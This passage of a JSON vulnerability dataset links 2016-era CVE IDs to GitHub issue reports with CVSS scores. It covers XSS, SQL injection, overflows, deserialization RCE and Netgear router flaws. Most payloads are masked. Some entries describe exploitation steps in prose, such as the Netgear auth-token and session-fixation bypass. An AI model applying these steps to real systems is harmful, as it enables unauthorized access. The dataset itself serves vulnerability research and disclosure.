  1864. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/3228",
  1865. "Repo_new": "hapijs/hapi",
  1866. "Issue_Created_At": "2016-07-04T04:26:55Z",
  1867. "description": "Update hapijs/call to NUMBERTAG from NUMBERTAG",
  1868. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  1869. "severity": "MEDIUM",
  1870. "baseScore": 5.3,
  1871. "impactScore": 1.4,
  1872. "exploitabilityScore": 3.9
  1873. },
  1874. {
  1875. "CVE_ID": "CVE-2016-10547",
  1876. "Issue_Url_old": "https://github.com/mozilla/nunjucks/issues/835",
  1877. "Issue_Url_new": "https://github.com/mozilla/nunjucks/issues/835",
  1878. "Repo_new": "mozilla/nunjucks",
  1879. "Issue_Created_At": "2016-09-07T03:56:25Z",
  1880. "description": "Bypass autoescape / XSS. The following string works as expected: ERRORTAG If however the variable passed to the template is an array autoescape does nothing: ERRORTAG If autoescape is on, I would expect any variable that is rendered in a {{ }} block to be escaped. This looks to be intentional from: URLTAG In express / Koa / (anything else using qs or body parser) it is trivial to coerce. See the following simple example in express: ERRORTAG APITAG I created a more detailed writeup and example app at: URLTAG",
  1881. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1882. "severity": "MEDIUM",
  1883. "baseScore": 6.1,
  1884. "impactScore": 2.7,
  1885. "exploitabilityScore": 2.8
  1886. },
  1887. {
  1888. "CVE_ID": "CVE-2016-10551",
  1889. "Issue_Url_old": "https://github.com/balderdashy/waterline/issues/1219",
  1890. "Issue_Url_new": "https://github.com/balderdashy/sails/issues/5347",
  1891. "Repo_new": "balderdashy/sails",
  1892. "Issue_Created_At": "2015-11-17T01:15:37Z",
  1893. "description": "SQL Injection with default blueprints in Waterline. I have a model called \"patients\" which is using the default find blueprint in sails (its controller definition is just APITAG ). I have a sinking suspicion it may have to do with node mysql not actually supporting prepared statements ( URLTAG I'm able to recreate the issue on any string field by passing in APITAG in APITAG as a where criteria. E.g. this: APITAG Returns all records in the patients table. Scary. I have: APITAG In my FILETAG . Has anyone else experienced anything similar?",
  1894. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1895. "severity": "CRITICAL",
  1896. "baseScore": 9.8,
  1897. "impactScore": 5.9,
  1898. "exploitabilityScore": 3.9
  1899. },
  1900. {
  1901. "CVE_ID": "CVE-2016-10555",
  1902. "Issue_Url_old": "https://github.com/hokaccha/node-jwt-simple/issues/14",
  1903. "Issue_Url_new": "https://github.com/hokaccha/node-jwt-simple/issues/14",
  1904. "Repo_new": "hokaccha/node-jwt-simple",
  1905. "Issue_Created_At": "2015-04-01T16:41:32Z",
  1906. "description": "Add a verify(token, algorithm, APITAG method as per this posting regarding vulnerabilities in jwt: URLTAG",
  1907. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  1908. "severity": "MEDIUM",
  1909. "baseScore": 6.5,
  1910. "impactScore": 3.6,
  1911. "exploitabilityScore": 2.8
  1912. },
  1913. {
  1914. "CVE_ID": "CVE-2016-10556",
  1915. "Issue_Url_old": "https://github.com/sequelize/sequelize/issues/5671",
  1916. "Issue_Url_new": "https://github.com/sequelize/sequelize/issues/5671",
  1917. "Repo_new": "sequelize/sequelize",
  1918. "Issue_Created_At": "2016-03-29T12:15:17Z",
  1919. "description": "sql injection in \"IN\" statement. i'm using mssql. sequelize version is NUMBERTAG sample: ERRORTAG because tedious doesn't support arrays as parameters you must add a parameter for every item in the array and use it in the query ( APITAG ). now there is an option to do sql injection.",
  1920. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1921. "severity": "HIGH",
  1922. "baseScore": 7.5,
  1923. "impactScore": 3.6,
  1924. "exploitabilityScore": 3.9
  1925. },
  1926. {
  1927. "CVE_ID": "CVE-2016-10663",
  1928. "Issue_Url_old": "https://github.com/wixtoolset/issues/issues/6187",
  1929. "Issue_Url_new": "https://github.com/wixtoolset/issues/issues/6187",
  1930. "Repo_new": "wixtoolset/issues",
  1931. "Issue_Created_At": "2020-06-10T22:51:59Z",
  1932. "description": "Has CVETAG been addressed?. CVETAG concerns Wix but I can't see it addressed anywhere in the issues list. Are you aware of it and what's the resolution, if any? URLTAG",
  1933. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1934. "severity": "HIGH",
  1935. "baseScore": 8.1,
  1936. "impactScore": 5.9,
  1937. "exploitabilityScore": 2.2
  1938. },
  1939. {
  1940. "CVE_ID": "CVE-2016-10707",
  1941. "Issue_Url_old": "https://github.com/jquery/jquery/issues/3133",
  1942. "Issue_Url_new": "https://github.com/jquery/jquery/issues/3133",
  1943. "Repo_new": "jquery/jquery",
  1944. "Issue_Created_At": "2016-05-29T19:06:12Z",
  1945. "description": "Boolean attribute getters throw if the attribute name is not all lowercase. APITAG Description In NUMBERTAG we removed our logic that lowercased attribute names. This caused one regression: any attribute getter using a name for boolean attributes but not all lowercased is going into an infinite recursion, exceeding the stack call limit. Amongst others, this is breaking the APITAG test suite when tested with APITAG NUMBERTAG rc1. Link to test case URLTAG Basically, APITAG is enough to trigger the error.",
  1946. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1947. "severity": "HIGH",
  1948. "baseScore": 7.5,
  1949. "impactScore": 3.6,
  1950. "exploitabilityScore": 3.9
  1951. },
  1952. {
  1953. "CVE_ID": "CVE-2016-10718",
  1954. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/5007",
  1955. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/5007",
  1956. "Repo_new": "brave/browser-laptop",
  1957. "Issue_Created_At": "2016-10-20T16:30:26Z",
  1958. "description": "the last open tab should only be saved if the window is closed. Did you search for similar issues before submitting this one? Yes Describe the issue you encountered: If you have a single window with only one tab and you close the tab itself that tab should not be restored on the next load. It should only be saved if the window is closed while the tab is still open. This is one of two bugs that enables a APITAG from URLTAG Expected behavior: If the tab is closed it should not be restored when Brave is opened again Platform APITAG NUMBERTAG APITAG Linux distro?): Win and Linux Brave Version NUMBERTAG Steps to reproduce NUMBERTAG Open this page CODETAG NUMBERTAG Click the link to close the tab NUMBERTAG Reopen Brave If the page is changed to call the script without the click it becomes a APITAG on Windows and Linux if it is the only tab in the last window",
  1959. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1960. "severity": "HIGH",
  1961. "baseScore": 7.5,
  1962. "impactScore": 3.6,
  1963. "exploitabilityScore": 3.9
  1964. },
  1965. {
  1966. "CVE_ID": "CVE-2016-10718",
  1967. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/5006",
  1968. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/5006",
  1969. "Repo_new": "brave/browser-laptop",
  1970. "Issue_Created_At": "2016-10-20T16:26:46Z",
  1971. "description": "APITAG should be blocked unless the script also opened the tab. Did you search for similar issues before submitting this one? Yes Describe the issue you encountered: From URLTAG It is possible for a tab to close itself even if the tab was not opened by a script. In Chrome this is blocked with the message Scripts may close only the windows that were opened by it which is controlled by webkit APITAG APITAG . Expected behavior: APITAG should only allow a tab to be closed if it was opened by the script Platform APITAG NUMBERTAG APITAG Linux distro?): All Brave Version NUMBERTAG Steps to reproduce NUMBERTAG Open a page with CODETAG",
  1972. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1973. "severity": "HIGH",
  1974. "baseScore": 7.5,
  1975. "impactScore": 3.6,
  1976. "exploitabilityScore": 3.9
  1977. },
  1978. {
  1979. "CVE_ID": "CVE-2016-10721",
  1980. "Issue_Url_old": "https://github.com/Thomas-Tsai/partclone/issues/82",
  1981. "Issue_Url_new": "https://github.com/thomas-tsai/partclone/issues/82",
  1982. "Repo_new": "thomas-tsai/partclone",
  1983. "Issue_Created_At": "2016-11-14T22:05:40Z",
  1984. "description": "Restore Heap Overflow. ERRORTAG",
  1985. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1986. "severity": "CRITICAL",
  1987. "baseScore": 9.8,
  1988. "impactScore": 5.9,
  1989. "exploitabilityScore": 3.9
  1990. },
  1991. {
  1992. "CVE_ID": "CVE-2016-10722",
  1993. "Issue_Url_old": "https://github.com/Thomas-Tsai/partclone/issues/71",
  1994. "Issue_Url_new": "https://github.com/thomas-tsai/partclone/issues/71",
  1995. "Repo_new": "thomas-tsai/partclone",
  1996. "Issue_Created_At": "2016-01-05T18:58:27Z",
  1997. "description": "FAT Bitmap Heap Overflow. ERRORTAG",
  1998. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1999. "severity": "CRITICAL",
  2000. "baseScore": 9.8,
  2001. "impactScore": 5.9,
  2002. "exploitabilityScore": 3.9
  2003. },
  2004. {
  2005. "CVE_ID": "CVE-2016-10735",
  2006. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/20184",
  2007. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/20184",
  2008. "Repo_new": "twbs/bootstrap",
  2009. "Issue_Created_At": "2016-06-27T15:33:54Z",
  2010. "description": "XSS in data target attribute. The data target attribute is vulnerable to Cross Site Scripting attacks: APITAG APITAG APITAG APITAG APITAG APITAG APITAG This is safe in HTML, but becomes vulnerable with Bootstrap.",
  2011. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2012. "severity": "MEDIUM",
  2013. "baseScore": 6.1,
  2014. "impactScore": 2.7,
  2015. "exploitabilityScore": 2.8
  2016. },
  2017. {
  2018. "CVE_ID": "CVE-2016-10735",
  2019. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/27915",
  2020. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/27915",
  2021. "Repo_new": "twbs/bootstrap",
  2022. "Issue_Created_At": "2018-12-23T16:23:10Z",
  2023. "description": "Github considers bootstrap NUMBERTAG as insecure. Hi Bootstrap team. Github considers bootstrap NUMBERTAG as an insecure dependency via its security vulnerabilities alerts tool: URLTAG It points to the URLTAG page and this page shows that only NUMBERTAG is secure. Is NUMBERTAG safe to use, as it has a fix for the URLTAG vulnerability, or is it something different? screenshot from one of our private projects FILETAG",
  2024. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2025. "severity": "MEDIUM",
  2026. "baseScore": 6.1,
  2027. "impactScore": 2.7,
  2028. "exploitabilityScore": 2.8
  2029. },
  2030. {
  2031. "CVE_ID": "CVE-2016-10744",
  2032. "Issue_Url_old": "https://github.com/select2/select2/issues/4587",
  2033. "Issue_Url_new": "https://github.com/select2/select2/issues/4587",
  2034. "Repo_new": "select2/select2",
  2035. "Issue_Created_At": "2016-09-15T13:35:32Z",
  2036. "description": "XSS vulnerability in URLTAG Under APITAG remote data\", the data that is retrieved remotely is not sanitized before displaying it, and this should be done to prevent XSS issues. For example, when I enter _je1_ in the input field, one of the retrieved APITAG repo's data contains malicious JS code that is executed and that simulates a fake APITAG page which asks for your credit card info (seems like phishing).",
  2037. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2038. "severity": "MEDIUM",
  2039. "baseScore": 6.1,
  2040. "impactScore": 2.7,
  2041. "exploitabilityScore": 2.8
  2042. },
  2043. {
  2044. "CVE_ID": "CVE-2016-10749",
  2045. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/30",
  2046. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/30",
  2047. "Repo_new": "davegamble/cjson",
  2048. "Issue_Created_At": "2016-10-01T08:19:37Z",
  2049. "description": "cJSON buffer overflow with odd formatted JSON string. Hi, I would like to report a buffer overflow in cJSON, you can test this APITAG with an ODD string CODETAG building it with ASAN will trigger an out of bound on the input string, which can be problematic since in lot of use cases the JSON input to applications using cJSON is untrusted. Thanks Marco > APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG d5 at pc NUMBERTAG fb bp NUMBERTAG fff5fbff2a0 sp NUMBERTAG fff5fbff NUMBERTAG READ of size NUMBERTAG at NUMBERTAG d5 thread T NUMBERTAG fa in parse_string APITAG NUMBERTAG a NUMBERTAG in parse_value APITAG NUMBERTAG bb in APITAG APITAG NUMBERTAG dfa in APITAG APITAG NUMBERTAG e NUMBERTAG in main APITAG NUMBERTAG fff NUMBERTAG bb5ac in start APITAG NUMBERTAG d5 is located NUMBERTAG bytes to the right of global variable '<string literal>' defined in PATHTAG NUMBERTAG c0) of size NUMBERTAG string literal>' is ascii string NUMBERTAG SUMMARY: APITAG global buffer overflow APITAG in parse_string > Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG e NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f9 > Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): > Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa > Heap right redzone: fb > Freed heap region: fd > Stack left redzone: f1 > Stack mid redzone: f2 > Stack right redzone: f3 > Stack partial redzone: f4 > Stack after return: f5 > Stack use after scope: f8 > Global redzone: f9 > Global init order: f6 > Poisoned by user: f7 > Container overflow: fc > Array cookie: ac > Intra object redzone: bb > APITAG internal: fe > Left alloca redzone: ca > Right alloca redzone: cb NUMBERTAG ABORTING >",
  2050. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2051. "severity": "CRITICAL",
  2052. "baseScore": 9.8,
  2053. "impactScore": 5.9,
  2054. "exploitabilityScore": 3.9
  2055. },
  2056. {
  2057. "CVE_ID": "CVE-2016-10750",
  2058. "Issue_Url_old": "https://github.com/hazelcast/hazelcast/issues/8024",
  2059. "Issue_Url_new": "https://github.com/hazelcast/hazelcast/issues/8024",
  2060. "Repo_new": "hazelcast/hazelcast",
  2061. "Issue_Created_At": "2016-04-26T20:29:27Z",
  2062. "description": "Hazelcast is vulnerable to untrusted deserialization remote code execution. I emailed the support address on April NUMBERTAG and received a response indicating that I should report my findings here. So here we are. The Hazelcast cluster join procedure is vulnerable to remote code execution due to Java deserialization. If an attacker can reach a listening Hazelcast instance with a crafted APITAG , and vulnerable classes are also on the classpath, the attacker can run arbitrary shell commands (among other nefarious things). Hazelcast will blindly deserialize any object it receives in that request stream. Since the APITAG is what implements authentication, this is necessarily pre authentication. This was verified against the latest code from the Git repository, as well as releases NUMBERTAG and NUMBERTAG I have a small whitelist/blacklist filter patch that I can submit a PR for, once I'm cleared to do so. I've already emailed the signed form. Or if you have another solution, feel free! If you choose to go the filtering route, the Hazelcast team should probably create a default whitelist for serialization, because blacklists are almost always out of date as soon as they are created.",
  2063. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2064. "severity": "HIGH",
  2065. "baseScore": 8.1,
  2066. "impactScore": 5.9,
  2067. "exploitabilityScore": 2.2
  2068. },
  2069. {
  2070. "CVE_ID": "CVE-2016-10937",
  2071. "Issue_Url_old": "https://github.com/lefcha/imapfilter/issues/142",
  2072. "Issue_Url_new": "https://github.com/lefcha/imapfilter/issues/142",
  2073. "Repo_new": "lefcha/imapfilter",
  2074. "Issue_Created_At": "2016-11-25T18:26:37Z",
  2075. "description": "No certificate verification. Apparently imapfilter is not checking the certificate after connecting to the imap server, or I am missing something. If the DNS is compromised by some hacker and imapfilter is directed to a fake IP address, the certificate supplied by that IP address will be accepted as valid if it is properly signed. What I mean is that if imapfilter is expecting to connect to APITAG and the server signed and valid certificate is from APITAG the connection will go through even if that is not the expected server. Apparently you have to use a SSL validate callback to solve that (SSL_CTX_set_verify)",
  2076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  2077. "severity": "HIGH",
  2078. "baseScore": 7.5,
  2079. "impactScore": 3.6,
  2080. "exploitabilityScore": 3.9
  2081. },
  2082. {
  2083. "CVE_ID": "CVE-2016-11014",
  2084. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/14",
  2085. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/14",
  2086. "Repo_new": "cybersecurityworks/disclosed",
  2087. "Issue_Created_At": "2016-01-11T07:53:05Z",
  2088. "description": "Authentication Bypass in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Details ================ Product Vendor: Netgear Bug Name: Authentication Bypass in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Software: Netgear Router JNR NUMBERTAG Firmware Version NUMBERTAG Last Updated: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity High Status: APITAG Fixed APITAG POC Video URL: URLTAG Description ================ This flaw may allow a successful attacker to do anything gaining the privilege of the router being in LAN/WAN. Proof of concept: (POC) ================== APITAG Authentication & Session Management: APITAG APITAG Bypass: APITAG Try Accessing the URL which the normal user have no longer access without credentials with auth token value as \u201cok\u201d and HTTP Basic Authentication header with password value. APITAG Session Management: APITAG Create a fake Session ID and submit the request to the server with the credentials. Whereas, you can see that the session id has no change even after getting logged in and during logout process. FILETAG APITAG NUMBERTAG APITAG Session id created by an attacker before login FILETAG APITAG NUMBERTAG APITAG Attacker Session id is not changed even after login FILETAG APITAG NUMBERTAG APITAG Session id remains the same even after logging out from the current session. FILETAG APITAG NUMBERTAG APITAG Back button history of the accessed router after logging out FILETAG APITAG NUMBERTAG APITAG auth token is set to \u201cok\u201d once after logging into the router. But, we couldn\u2019t access any pages just by pressing back button after logging out FILETAG APITAG NUMBERTAG APITAG Changing the auth token value from \u201cok\u201d to \u201cnok\u201d and removing extra session tokens will give access to the unauthorized page with the same session id created by an attacker. FILETAG APITAG NUMBERTAG APITAG Authentication logic is bypassed and an attacker can access any pages inside login without credentials APITAG APITAG PATHTAG \u2013 Discovered in Netgear Router Firmware Version NUMBERTAG PATHTAG Reported to vendor through support option but, no response PATHTAG Reported to vendor through another support option available APITAG here APITAG . But, again no response. PATHTAG Finally, Technical Team started addressing about the issue after so many followups through phone/mail. PATHTAG Vulnerability got fixed & case was closed. PATHTAG Netgear Released updated Netgear Router JNR NUMBERTAG ersion NUMBERTAG APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  2089. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2090. "severity": "CRITICAL",
  2091. "baseScore": 9.8,
  2092. "impactScore": 5.9,
  2093. "exploitabilityScore": 3.9
  2094. },
  2095. {
  2096. "CVE_ID": "CVE-2016-11015",
  2097. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/13",
  2098. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/13",
  2099. "Repo_new": "cybersecurityworks/disclosed",
  2100. "Issue_Created_At": "2016-01-11T05:52:35Z",
  2101. "description": "Cross Site Request Forgery in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Details ================ Product Vendor: Netgear Bug Name: Cross Site Request Forgery in Netgear Router JNR NUMBERTAG ersion NUMBERTAG Software: Netgear Router Firmware Version NUMBERTAG Last Updated: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity High Status: APITAG Fixed APITAG POC Video URL: URLTAG Description ================ Using this flaw, an attacker can cause victims to change any data the victim is allowed to change or perform any function the victim is authorized to use. Proof of concept: (POC) ================== Created a forged request changing the value of any variable, here it is APITAG APITAG APITAG variable in the URL URLTAG and sent it to victim forcing him/her to click on the malicious link generated by an attacker with different session allows an attacker to change the settings of the victim\u2019s router. FILETAG APITAG NUMBERTAG APITAG Blocked sites keywords before CSRF request sent to the victim FILETAG APITAG NUMBERTAG APITAG a CSRF Request is created by changing Block list URL variable FILETAG APITAG NUMBERTAG APITAG CSRF request is successfully submitted in the victims browser Note: Similarly, we can manipulate any request and can force victim to access the link generated by the attacker to make changes to the router settings without victim\u2019s knowledge. APITAG APITAG PATHTAG \u2013 Discovered in Netgear Router Firmware Version NUMBERTAG PATHTAG Reported to vendor through support option but, no response PATHTAG Reported to vendor through another support option available APITAG here APITAG . But, again no response. PATHTAG Finally, Technical Team started addressing about the issue after so many followups through phone/mail. PATHTAG Vulnerability got fixed & case was closed. PATHTAG Netgear Released updated version NUMBERTAG APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  2102. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  2103. "severity": "MEDIUM",
  2104. "baseScore": 6.5,
  2105. "impactScore": 3.6,
  2106. "exploitabilityScore": 2.8
  2107. },
  2108. {
  2109. "CVE_ID": "CVE-2016-11016",
  2110. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/12",
  2111. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/12",
  2112. "Repo_new": "cybersecurityworks/disclosed",
  2113. "Issue_Created_At": "2016-01-09T12:31:10Z",
  2114. "description": "Multiple Cross Site Scripting in Netgear Router Version NUMBERTAG Details ================ Product Vendor: Netgear Bug Name: Cross Site Scripting in Netgear Router Version NUMBERTAG Software: Netgear Router Firmware Version NUMBERTAG Last Updated: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity High Vulnerable URL: APITAG URLTAG APITAG Vulnerable Variable: APITAG getpage, var:page & var:menu APITAG Parameter: GET Status: APITAG Fixed APITAG Exploitation Requires Authentication?: no POC URL: URLTAG Description ================ Cross Site Scripting (XSS) vulnerability in Netgear Router Firmware Version NUMBERTAG By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies. This means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) ================== Inject the malicious APITAG code APITAG in the APITAG getpage APITAG variable in the URL APITAG URLTAG APITAG and viewing it on browser will result in execution of Cross Site Scripting (XSS) APITAG APITAG Similarly, APITAG var:page APITAG & APITAG var:menu APITAG variable is also injected with malicious APITAG payload and use it as a vehicle for further attack. APITAG NUMBERTAG APITAG The GET request parameter APITAG getpage APITAG variable in the following URL APITAG URLTAG APITAG is vulnerable to Cross Site Scripting (XSS). FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to APITAG getpage APITAG variable and its echoed back in the given response URL APITAG URLTAG APITAG FILETAG APITAG NUMBERTAG APITAG XSS Payload gets reflected in the browser APITAG NUMBERTAG APITAG The GET request parameter APITAG var:page APITAG variable in the following URL APITAG URLTAG APITAG is vulnerable to Cross Site Scripting (XSS). 
FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to APITAG var:page APITAG variable and its echoed back in the given response URL APITAG URLTAG APITAG APITAG NUMBERTAG APITAG The GET request parameter APITAG var:menu APITAG variable in the following URL APITAG URLTAG APITAG is vulnerable to Cross Site Scripting (XSS). FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to APITAG var:menu APITAG variable and its echoed back in the given response URL APITAG URLTAG APITAG APITAG APITAG PATHTAG \u2013 Discovered in Netgear Router Firmware Version NUMBERTAG PATHTAG Reported to vendor through support option but, no response PATHTAG Reported to vendor through another support option available APITAG here APITAG . But, again no response. PATHTAG Finally, Technical Team started addressing about the issue after so many followups through phone/mail. PATHTAG Vulnerability got fixed & case was closed. PATHTAG Netgear Released updated version NUMBERTAG APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  2115. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2116. "severity": "MEDIUM",
  2117. "baseScore": 6.1,
  2118. "impactScore": 2.7,
  2119. "exploitabilityScore": 2.8
  2120. },
  2121. {
  2122. "CVE_ID": "CVE-2016-11086",
  2123. "Issue_Url_old": "https://github.com/oauth-xx/oauth-ruby/issues/137",
  2124. "Issue_Url_new": "https://github.com/oauth-xx/oauth-ruby/issues/137",
  2125. "Repo_new": "oauth-xx/oauth-ruby",
  2126. "Issue_Created_At": "2016-12-01T21:59:31Z",
  2127. "description": "Certificate and chain not validated if certificate bundle cannot be found. While analysing the source code of some third party libraries we use in our projects, I found an issue with the way certificate validation is handled in this library. If the certificate bundle cannot be found on the file system at three known/specified locations, then it silently falls back to a mode (i.e. APITAG ) in which the certificate and the certificate chain aren't validated at all. See the following code fragments copied from APITAG . If the environment variable APITAG is not set, and no file can be found in the three specified locations, then APITAG is assigned nil . If you then look at the second code fragment, you can see that APITAG will be set to APITAG if APITAG equals nil and if the user hasn't explicitly set APITAG in the options object. Lines NUMBERTAG URLTAG : ERRORTAG Lines NUMBERTAG URLTAG : CODETAG I would expect a library to fail hard (i.e. throw an exception) in this case, and not silently fall back to an insecure mode. Also, it might be a good idea to embed a certificate bundle (e.g. FILETAG in the library itself. If no system certificate bundle can be found, then you could always fall back to the embedded certificate bundle. Let me know if you do have questions.",
  2128. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  2129. "severity": "HIGH",
  2130. "baseScore": 7.4,
  2131. "impactScore": 5.2,
  2132. "exploitabilityScore": 2.2
  2133. },
  2134. {
  2135. "CVE_ID": "CVE-2016-1133",
  2136. "Issue_Url_old": "https://github.com/h2o/h2o/issues/682",
  2137. "Issue_Url_new": "https://github.com/h2o/h2o/issues/682",
  2138. "Repo_new": "h2o/h2o",
  2139. "Issue_Created_At": "2016-01-07T09:22:38Z",
  2140. "description": "HTTP response splitting. Hi, I found out that I can do HTTP response splitting in h2o by feeding the URL with carriage return and new line (CRLF) characters. Example: APITAG CODETAG the h2o config: ERRORTAG",
  2141. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
  2142. "severity": "LOW",
  2143. "baseScore": 3.7,
  2144. "impactScore": 1.4,
  2145. "exploitabilityScore": 2.2
  2146. },
  2147. {
  2148. "CVE_ID": "CVE-2016-1541",
  2149. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/656",
  2150. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/656",
  2151. "Repo_new": "libarchive/libarchive",
  2152. "Issue_Created_At": "2016-02-08T18:18:05Z",
  2153. "description": "Vulnerable code, CVETAG . Looking to responsibly disclose a vulnerability in libarchive that could permit arbitrary code execution. We have samples to support our discovery.",
  2154. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2155. "severity": "HIGH",
  2156. "baseScore": 8.8,
  2157. "impactScore": 5.9,
  2158. "exploitabilityScore": 2.8
  2159. },
  2160. {
  2161. "CVE_ID": "CVE-2016-1905",
  2162. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/19479",
  2163. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/19479",
  2164. "Repo_new": "kubernetes/kubernetes",
  2165. "Issue_Created_At": "2016-01-11T15:29:14Z",
  2166. "description": "api server: patch operation should use patched object to check admission control. Currently, patch will check admission control with an empty object and if it passes, then will proceed to update the object with the patch. Admission control plugins don't get a chance to see/validate what is actually going to be updated.",
  2167. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
  2168. "severity": "HIGH",
  2169. "baseScore": 7.7,
  2170. "impactScore": 4.0,
  2171. "exploitabilityScore": 3.1
  2172. },
  2173. {
  2174. "CVE_ID": "CVE-2016-1906",
  2175. "Issue_Url_old": "https://github.com/openshift/origin/issues/6556",
  2176. "Issue_Url_new": "https://github.com/openshift/origin/issues/6556",
  2177. "Repo_new": "openshift/origin",
  2178. "Issue_Created_At": "2016-01-06T19:23:45Z",
  2179. "description": "Can edit a build config to a strategy that isn't allowed by policy; builds still fail correctly. If I apply the policy changes to restrict certain build strategies, I can create a BC with an allowed strategy and then edit the BC to use a restricted strategy; that edit should fail. Instead it allows the modification. It does still correctly prevent the builds from being launched.",
  2180. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2181. "severity": "CRITICAL",
  2182. "baseScore": 9.8,
  2183. "impactScore": 5.9,
  2184. "exploitabilityScore": 3.9
  2185. },
  2186. {
  2187. "CVE_ID": "CVE-2016-1912",
  2188. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/4341",
  2189. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/4341",
  2190. "Repo_new": "dolibarr/dolibarr",
  2191. "Issue_Created_At": "2016-01-06T18:37:07Z",
